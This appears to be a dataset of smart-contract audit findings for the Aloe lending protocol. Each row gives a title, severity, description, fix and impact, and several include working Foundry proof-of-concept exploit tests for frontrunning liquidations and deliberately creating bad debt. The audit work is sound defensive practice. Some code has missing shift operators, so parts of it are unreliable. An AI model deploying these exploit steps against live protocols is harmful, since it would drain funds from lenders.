```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n
It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidation
high
`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidation` clears the warning regardless of whether account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically keeping the position, but clearing the warning\\n account.liquidate(this, bytes(""), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: "Aloe: grace")\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n}\\n```\\n
Consider clearing "warn" status only if account is healthy after liquidation.
Very important protocol function (liquidation) can be DOS'ed and make the unhealthy accounts avoid liquidations for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt causing loss of funds for all protocol users as they will not be able to withdraw their funds and can cause a bank run - first users will be able to withdraw, but later users won't be able to withdraw as protocol won't have enough funds for this.
```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n
`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transaction
high
Possible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact this is already a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. This bad debt caused is the funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit large amount to lender before these steps, meaning the inflated interest rate will be accured by user's deposit to lender, but it will not be paid by the user due to bad debt (user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of accured 630 DAI, for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from "src/libraries/constants/Constants.sol";\\nimport {Q96} from "src/libraries/constants/Q.sol";\\nimport {zip} from "src/libraries/Positions.sol";\\n\\nimport "src/Borrower.sol";\\nimport "src/Factory.sol";\\nimport "src/Lender.sol";\\nimport "src/RateModel.sol";\\n\\nimport {FatFactory, VolatilityOracleMock} from "./Utils.sol";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl("mainnet"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the "extra" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n emit log_named_uint("Before liquidation User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Before liquidation User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint("Before liquidation User assets:", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 10629296791890000000000\\n User stored borrow:: 10000000000000000000000\\n Before liquidation User borrow:: 10630197795010000000000\\n Before liquidation User stored borrow:: 10630197795010000000000\\n Before liquidation User assets:: 10051000000000000000000\\n Liquidated User borrow:: 579197795010000000001\\n Liquidated User assets:: 0\\n```\\n\\nAs can be seen, in the end user debt is 579 DAI with 0 assets.
Consider using `borrowBalance` instead of `borrowBalanceStored` in `_getLiabilities()`.
Malicious user can create bad debt to his account in 1 transaction. Bad debt is the amount not withdrawable from the lender by users who deposited. Since users will know that the lender doesn't have enough assets to pay out to all users, it can cause bank run since first users to withdraw from lender will be able to do so, while those who are the last to withdraw will lose their funds.
```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from "src/libraries/constants/Constants.sol";\\nimport {Q96} from "src/libraries/constants/Q.sol";\\nimport {zip} from "src/libraries/Positions.sol";\\n\\nimport "src/Borrower.sol";\\nimport "src/Factory.sol";\\nimport "src/Lender.sol";\\nimport "src/RateModel.sol";\\n\\nimport {FatFactory, VolatilityOracleMock} from "./Utils.sol";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ? _A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl("mainnet"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the "extra" balance putting account into bad debt\\n bytes memory data2 = abi.encode(Action.WITHDRAW, 1000e18, 0);\\n account.modify(this, data2, (1 << 32));\\n\\n // account is still not liquidatable (because liquidation also uses stored liabilities)\\n vm.expectRevert();\\n account.warn((1 << 32));\\n\\n // make account liquidatable by settling accumulated interest\\n lender0.accrueInterest();\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n emit log_named_uint("Before liquidation User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Before liquidation User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n emit log_named_uint("Before liquidation User assets:", asset0.balanceOf(address(account)));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n }\\n\\n enum Action {\\n WITHDRAW,\\n BORROW,\\n UNI_DEPOSIT\\n }\\n\\n // IManager\\n function callback(bytes calldata data, address, uint208) external returns (uint208 positions) {\\n require(msg.sender == address(account));\\n\\n (Action action, uint256 amount0, uint256 amount1) = abi.decode(data, (Action, uint256, uint256));\\n\\n if (action == Action.WITHDRAW) {\\n account.transfer(amount0, amount1, address(this));\\n } else if (action == Action.BORROW) {\\n account.borrow(amount0, amount1, msg.sender);\\n } else if (action == Action.UNI_DEPOSIT) {\\n account.uniswapDeposit(-75600, -75540, 200000000000000000);\\n positions = zip([-75600, -75540, 0, 0, 0, 0]);\\n }\\n }\\n\\n // ILiquidator\\n receive() external payable {}\\n\\n function swap1For0(bytes calldata data, uint256 actual, uint256 expected0) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, false, -int256(expected0), TickMath.MAX_SQRT_RATIO - 1, bytes(""));\\n }\\n\\n function swap0For1(bytes calldata data, uint256 actual, uint256 expected1) external {\\n /*\\n uint256 expected = abi.decode(data, (uint256));\\n if (expected == type(uint256).max) {\\n Borrower(payable(msg.sender)).liquidate(this, data, 1, (1 << 32));\\n }\\n assertEq(actual, expected);\\n */\\n pool.swap(msg.sender, true, -int256(expected1), TickMath.MIN_SQRT_RATIO + 1, bytes(""));\\n }\\n\\n // IUniswapV3SwapCallback\\n function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata) external {\\n if (amount0Delta > 0) asset0.transfer(msg.sender, uint256(amount0Delta));\\n if (amount1Delta > 0) asset1.transfer(msg.sender, uint256(amount1Delta));\\n }\\n\\n // Factory mock\\n function getParameters(IUniswapV3Pool) external pure returns (uint248 ante, uint8 nSigma) {\\n ante = DEFAULT_ANTE;\\n nSigma = DEFAULT_N_SIGMA;\\n }\\n\\n // (helpers)\\n function _setInterest(Lender lender, uint256 amount) private {\\n bytes32 ID = bytes32(uint256(1));\\n uint256 slot1 = uint256(vm.load(address(lender), ID));\\n\\n uint256 borrowBase = slot1 % (1 << 184);\\n uint256 borrowIndex = slot1 184;\\n\\n uint256 newSlot1 = borrowBase + (((borrowIndex * amount) / 10_000) << 184);\\n vm.store(address(lender), ID, bytes32(newSlot1));\\n }\\n}\\n```\\n
IV Can be Decreased for Free
high
The liquidity at a single `tickSpacing` is used to calcualte the `IV`. The more liquidity is in this tick spacing, the lower the `IV`, as demonstarated by the `tickTvl` dividing the return value of the `estimate` function:\\n```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n\\nSince this is using data only from the block that the function is called, the liuquidyt can easily be increased by:\\ndepositing a large amount liquidity into the `tickSpacing`\\ncalling update\\nremoving the liquidity\\nNote that only a small portion of the total liquidity is in the entire pool is in the active liquidity tick. Therefore, the capital cost required to massively increase the liquidity is low. Additionally, the manipulation has zero cost (aside from gas fees), as no trading is done through the pool. Contract this with a pool price manipulation, which costs a significant amount of trading fees to trade through a large amount of the liquidity of the pool.\\nSince this manipulation costs nothing except gas, the `IV_CHANGE_PER_UPDATE` which limits of the amount that IV can be manipulated per update does not sufficiently disincentivise manipulation, it just extends the time period required to manipulate.\\nDecreasing the IV increases the LTV, and due to the free cost, its reasonable to increase the LTV to the max LTV of 90% even for very volatile assets. Aloe uses the IV to estimate the probability of insolvency of loans. With the delay inherent in TWAP oracle and the liquidation delay by the warn-then-liquidate process, this manipulation can turn price change based insolvency from a 5 sigma event (as designed by the protocol) to a likely event.
Use the time weighted average liquidity of in-range ticks of the recent past, so that single block + single tickSpacing liquidity deposits cannot manipulate IV significantly.
Decreasing IV can be done at zero cost aside from gas fees.\\nThis can be used to borrow assets at far more leverage than the proper LTV\\nBorrowers can use this to avoid liquidation\\nThis also breaks the insolvency estimation based on IV for riskiness of price-change caused insolvency.
```\\n return SoladyMath.sqrt((4e24 * volumeGamma0Gamma1 * scale) / (b.timestamp - a.timestamp) / tickTvl);\\n```\\n
governor can permanently prevent withdrawals in spite of being restricted
medium
Quoting from the Contest README:\\n```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n\\nThe mechanism by which users are ensured that they can withdraw their funds is the interest rate which increases with utilization.\\nMarket forces will keep the utilization in balance such that when users want to withdraw their funds from the `Lender` contracts, the interest rate increases and Borrowers pay back their loans (or get liquidated).\\nWhat the `governor` is allowed to do is to set a interest rate model via the `Factory.governMarketConfig` function.\\nThis clearly shows that the `governor` should be very much restricted in setting the `RateModel` such as to not damage users of the protocol which is in line with how the `governor` role is described in the README.\\nHowever the interest rate can be set to zero even if the utilization is very high. If Borrowers can borrow funds for a zero interest rate, they will never pay back their loans. This means that users in the Lenders will never be able to withdraw their funds.\\nIt is also noteworthy that the timelock that the governor uses won't be able to prevent this scenario since even if users withdraw their funds as quickly as possible, there will probably not be enough time / availability of funds for everyone to withdraw in time (assuming a realistic timelock length).
The `SafeRateLib` should ensure that as the utilization approaches `1e18` (100%), the interest rate cannot be below a certain minimum value.\\nThis ensures that even if the `governor` behaves maliciously or uses a broken `RateModel`, Borrowers will never borrow all funds without paying them back.
The `governor` is able to permanently prevent withdrawals from the Lenders which it should not be able to do according to the contest README.
```\\nIs the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\n\\nRestricted. The governor address should not be able to steal funds or prevent users from withdrawing. It does have access to the govern methods in Factory, and it could trigger liquidations by increasing nSigma. We consider this an acceptable risk, and the governor itself will have a timelock.\\n```\\n
Uniswap Formula Drastically Underestimates Volatilty
medium
Note: This report will use annualised IV expressed in % will be use, even though the code representation uses different scaling.\\nAloe estimates implied volatility based on the article cited below (taken from in-line code comments)\\nLambert's article describes a method of valuing Uniswap liquidity positions based on volatility. It is correct to say that the expected value of holding an LP position can be determined by the formula referenced in the article. A liquidity position can be valued with the same as "selling a straddle" which is a short-volatility strategy which involves selling both a put and a call. Lambert does this by representing fee collection as an options premium and impermanat loss as the cost paid by the seller when the underlying hits the strike price. If the implied volatility of a uniswap position is above the fair IV, then it is profitable to be a liquidity provider, if it is lower, than it is not.\\nKEY POINT: However, this does not mean that re-arranging the formula to derive IV gives a correct estimation of IV.\\nThe assumptions of the efficient market hypothesis holds true only when there is a mechanism and incentive for rational actors to arbitrage the value of positions to fair value. There is a direct mechanism to push down the IV of Uniswap liquidity positions - if the IV is too high then providing liquidity is +EV, so rational actors would deposit liquidity, and thus the IV as calculated by Aloe's formula will decrease.\\nHowever, when the `IV` derived from Uniswap fees and liquidity is too low, there is no mechanism for rational actors to profit off correcting this. If you are not already a liquidity provider, there is no way to provide "negative liquidity" or "short a liquidity position".\\nIn fact the linked article by Lambert Guillaume contains data which demonstrates this exact fact - the table which shows the derived IV at time of writing having far lower results than the historical volatilities and the the IV derived from markets that allow both long and short trading (like options exchanges such as Deribit).\\nHere is a quote from that exact article, which points out that the Uniswap derived IV is sometimes 2.5x lower. Also check out the table directly in the article for reference:\\n```\\n"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets."\\n```\\n\\nThe `IV's` in options markets or protocols that have long-short mechanisms such as Opyn's Squeeth have a correction mechanism for `IV's` which are too low, because you can both buy and sell options, and are therefore "correct" according to Efficient Market Hypothesis. The Uniswap pool is a "long-only" market, where liquidity can be added, but not shorted, which leads to systematically lower `IV` than is realistic. The EMH model, both in soft and hard form, only holds when there is a mechnaism for a rational minority to profit off correcting a market imbalance. If many irrational or utilitarian users deposits too much liquidity into a Uniswap v3 pool relative to the fee capture and `IV`, theres no way to profit off correcting this imbalance.\\nThere are 3 ways to validate the claim that the Uniswap formula drastically underestimates the IV:\\nOn chain data which shows that the liquidty and fee derivation from Uniswap gives far lower results than other\\nThe table provided in Lambert Guillaume's article, which shows a Uniswap pool derived IVs which are far lower than the historical volatilities of the asset.\\nStudies showing that liquidity providers suffer far more impermanent loss than fees.
2 possible options (excuse the pun):\\nUse historical price differences in the Uniswap pool (similar to a TWAP, but Time Weighted Average Price Difference) and use that to infer volatilty alongside the current implementations which is based on fees and liquidity. Both are inaccurate, but use the `maximum` of the two values. The 2 `IV` calculations can be used to "sanity check" the other, to correct one which drastically underestimates the risk\\nSame as above, use the `maximum` of the fee/liquidity derived `IV` but use a market that has long/short possibilities such as Opyn's Squeeth to sanity check the `IV`.
The lower `IV` increases LTV, which means far higher LTV for risky assets. `5 sigma` probability bad-debt events, as calculated by the protocol which is basically an impossibility, becomes possible/likely as the relationship between `IV` or `Pr(event)` is super-linear
```\\n"The realized volatility of most assets hover between 75% and 200% annualized in ETH terms. If we compare this to the IV extracted from the Uniswap v3 pools, we get:\\n\\nNote that the volatilities are somewhat lower, perhaps a factor of ~2.5, for most assets."\\n```\\n
Bad debt liquidation doesn't allow liquidator to receive its ETH bonus (ante)
medium
More detailed scenario\\nAlice account goes into bad debt for whatever reason. For example, the account has 150 DAI borrowed, but only 100 DAI assets.\\nBob tries to `liquidate` Alice account, but his transaction reverts, because remaining DAI liability after repaying 100 DAI assets Alice has, will be 50 DAI bad debt. `liquidate` code will try to call Bob's callee contract to swap 0.03 WETH to 50 DAI sending it 0.03 WETH. However, since Alice account has 0 WETH, the transfer will revert.\\nBob tries to work around the liquidation problem: 3.1. Bob calls `liquidate` with `strain` set to `type(uint256).max`. Liquidation succeeds, but Bob doesn't receive anything for his liquidation (he receives 0 ETH bonus). Alice's ante is stuck in the contract until Alice bad debt is fully repaid. 3.2. Bob sends 0.03 WETH directly to Alice account and calls `liquidate` normally. It succeeds and Bob gets his bonus for liquidation (0.01 ETH). He has 0.02 ETH net loss from liquidaiton (in addition to gas fees).\\nIn both cases there is no incentive for Bob to liquidate Alice. So it's likely Alice account won't be liquidated and a borrow of 150 will be stuck in Alice account for a long time. Some lender depositors who can't withdraw might still have incentive to liquidate Alice to be able to withdraw from lender, but Alice's ante will still be stuck in the contract.\\nThe scenario above is demonstrated in the test, add it to test/Liquidator.t.sol:\\n```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User assets:", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n emit log_named_uint("Liquidated User ante:", address(account).balance);\\n }\\n```\\n\\nExecution console log:\\n```\\n User borrow:: 150000000000000000000\\n User assets:: 101000000000000000000\\n Liquidated User borrow:: 49000000162000000001\\n Liquidated User assets:: 0\\n Liquidated User ante:: 10000000000000001\\n```\\n
Consider verifying the bad debt situation and not forcing swap which will fail, so that liquidation can repay whatever assets account still has and give liquidator its full bonus.
Liquidators are not compensated for bad debt liquidations in some cases. Ante (liquidator bonus) is stuck in the borrower smart contract until bad debt is repaid. There is not enough incentive to liquidate such bad debt accounts, which can lead for these accounts to accumulate even bigger bad debt and lender depositors being unable to withdraw their funds from lender.
```\\n function test_badDebtLiquidationAnte() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 1e18;\\n uint256 borrows0 = 100e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n // borrow increased by 50%\\n _setInterest(lender0, 15000);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User assets:", asset0.balanceOf(address(account)));\\n\\n // warn account\\n account.warn((1 << 32));\\n\\n // skip warning time\\n skip(LIQUIDATION_GRACE_PERIOD);\\n lender0.accrueInterest();\\n\\n // liquidation reverts because it requires asset the account doesn't have to swap\\n vm.expectRevert();\\n account.liquidate(this, bytes(""), 1, (1 << 32));\\n\\n // liquidate with max strain to avoid revert when trying to swap assets account doesn't have\\n account.liquidate(this, bytes(""), type(uint256).max, (1 << 32));\\n\\n emit log_named_uint("Liquidated User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("Liquidated User assets:", asset0.balanceOf(address(account)));\\n emit log_named_uint("Liquidated User ante:", address(account).balance);\\n }\\n```\\n
Oracle.sol: observe function has overflow risk and should cast to uint256 like Uniswap V3 does
medium
